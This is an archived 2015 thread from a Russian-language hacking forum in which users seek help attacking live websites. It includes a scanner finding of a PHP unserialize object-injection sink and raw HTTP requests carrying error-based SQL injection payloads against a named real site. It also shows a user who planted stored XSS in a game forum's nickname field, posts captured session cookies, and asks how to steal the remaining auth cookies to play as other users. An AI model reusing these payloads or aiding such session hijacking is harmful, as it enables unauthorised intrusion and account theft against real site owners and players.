ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.07.2015, 14:19
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
подскажите как юзнуть ету уязвимость
Код:
Code:
PHP Object Injection
Userinput reaches sensitive sink. For more information, press the help icon on the left side.
12: unserialize $data = unserialize($compressed);
9: $compressed = base64_decode($cookieData);
8: $cookieData = str_replace('#', '+', $cookieData);
6: $cookieData = $_COOKIE['___389_shR7_ZeE'];
|
|
|
19.07.2015, 15:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
|
|
|
|
19.07.2015, 20:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от palec2006
palec2006 said:
↑
чёт не могу дупля отстрелить
Код:
Code:
POST /search/ HTTP/1.1
Content-Length: 81
Host: www.fortun.ru
Connection: Keep-alive
Accept: */*
articles=1&news=1&pages=1&query='and extractvalue(1,concat(0x3a,(version())))and'
select фильтрует, всё пропало?
Код:
Code:
POST /calc/save_form/ HTTP/1.1
Host: www.fortun.ru
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.fortun.ru/calc/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
element%5B28|extractvalue(1,concat(0x3a,(select version())))%5D=on
|
|
|
|
21.07.2015, 16:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Привет всем,нашел атаку на сайте при создание ника можно в поле ника вписывать разные скрипты и все робит,допустим вписываю ява скрипт алерт и сообщение вылазит везде где отображается мой ник и еще когда захожу в админ панель и там скрипт тоже исполняется  но собственно сам вопрос как можно взломать сайт при поможи этого? |
|
|
|
22.07.2015, 04:22
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
|
|
|
|
22.07.2015, 09:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Да там куки почему то на сайте не подмениваются
|
|
|
|
22.07.2015, 13:46
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Поставьте вопрос более конкретно, с описанием всех Ваших действий
|
|
|
|
22.07.2015, 17:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Привет всем,вот мне приходят куки с форума игры.
------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;
w2vL_cca8_nofavfid=1;
PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;
w2vL_cca8_lastcheckfeed=21728%7C1437560824;
w2vL_cca8_visitedfid=45D46D53D2;
w2vL_cca8_viewid=tid_6189;
w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663;
w2vL_cca8_smile=1D1;
__zlcmid=Vienkp6pQjrijA;
_ga=GA1.2.956537111.1436906922F;
w2vL_cca8_lastact=1437566946%09forum.php%09;
w2vL_cca8_onlineusernum=59;
w2vL_cca8_sid=ro6N6g
------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
2)_ga=GA1.2.956537111.1436906922F
------------------------------------------------------------------------------------------------------
Но когда заменяю на форуме ,куки не подмениваются.
------------------------------------------------------------------------------------------------------
Сайт выглядит такого типа www.site.ru/forum/forum.php
На www.site.ru расположен профиль игрока,тут короче выбираешь сервер и играешь.
На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.
В чем может быть проблема?
|
|
|
|
22.07.2015, 18:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Сообщение от nik1201
nik1201 said:
↑
Привет всем,вот мне приходят куки с форума игры.
------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;
w2vL_cca8_nofavfid=1;
PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;
w2vL_cca8_lastcheckfeed=21728%7C1437560824;
w2vL_cca8_visitedfid=45D46D53D2;
w2vL_cca8_viewid=tid_6189;
w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663;
w2vL_cca8_smile=1D1;
__zlcmid=Vienkp6pQjrijA;
_ga=GA1.2.956537111.1436906922F;
w2vL_cca8_lastact=1437566946%09forum.php%09;
w2vL_cca8_onlineusernum=59;
w2vL_cca8_sid=ro6N6g
------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
2)_ga=GA1.2.956537111.1436906922F
------------------------------------------------------------------------------------------------------
Но когда заменяю на форуме ,куки не подмениваются.
------------------------------------------------------------------------------------------------------
Сайт выглядит такого типа www.site.ru/forum/forum.php
На www.site.ru расположен профиль игрока,тут короче выбираешь сервер и играешь.
На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.
В чем может быть проблема?Обычно с тем что там разные профили при регистрации, разные движки и базы данных.
|
|
|
|
22.07.2015, 19:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит.
------------------------------------------------------------------------------------------------------
w2vL_cca8_auth
and
w2vL_cca8_saltkey
------------------------------------------------------------------------------------------------------
Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru?
И что можно сделать что бы они шли?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
